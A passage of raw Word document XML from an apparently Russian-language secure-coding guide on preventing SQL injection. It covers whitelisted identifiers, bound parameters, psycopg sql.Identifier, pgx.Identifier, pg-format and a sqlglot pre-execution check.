        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i, f in enumerate(filters):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        col = f.column                            # whitelist через Literal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        op = f.operator                            # whitelist через Literal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        param_name = f"p{i}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        where_clauses.append(f"{col} {op} :{param_name}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        params[param_name] = f.value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = "SELECT * FROM users WHERE " + " AND ".join(where_clauses)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return session.execute(text(sql), params)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Literal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (pydantic) обеспечивает что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">operator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — only whitelist values. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> идёт параметром через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">:p{i}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Literal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отдельная валидация через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if col not in ALLOWED_COLUMNS</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psycopg.sql.SQL: composable safe SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3+) поставляет API для безопасного построения dynamic SQL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from psycopg import sql</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query = sql.SQL("SELECT {cols} FROM {table} WHERE {col} = %s").format(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cols=sql.SQL(', ').join(map(sql.Identifier, column_list)),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    table=sql.Identifier(table_name),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    col=sql.Identifier(filter_col),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># query — sql.Composable объект, не string. Передаётся в execute с params.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(query, (filter_value,))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sql.Identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> делает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-эквивалент на client-side. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sql.SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — building block для constants (operators, keywords). Plain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">str</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отвергнут с TypeError.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pgx.Identifier для Go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эквивалент в pgx (v5+):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import "github.com/jackc/pgx/v5"</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sql := fmt.Sprintf("SELECT * FROM %s WHERE id = $1",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    pgx.Identifier{schema, table}.Sanitize())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rows, err := conn.Query(ctx, sql, userID)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgx.Identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> принимает slice — для schema-qualified имён. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.Sanitize()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> делает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-эквивалент.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pg-format для node-postgres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эквивалент в node-postgres:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">const format = require('pg-format');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">const sql = format('SELECT * FROM %I WHERE id = $1', tableName);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">await client.query(sql, [userId]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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в pg-format поведением идентичен PostgreSQL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Также </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для literals,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для raw.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-execution SQL parse через sqlglot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для критичных code-paths (например, end-user-supplied SQL в analytics-tools) — pre-execution анализ через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlglot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import sqlglot</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def is_safe_select(sql: str) -&gt; bool:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        tree = sqlglot.parse_one(sql, dialect='postgres')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    except sqlglot.ParseError:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return False</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Запрет на all writes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
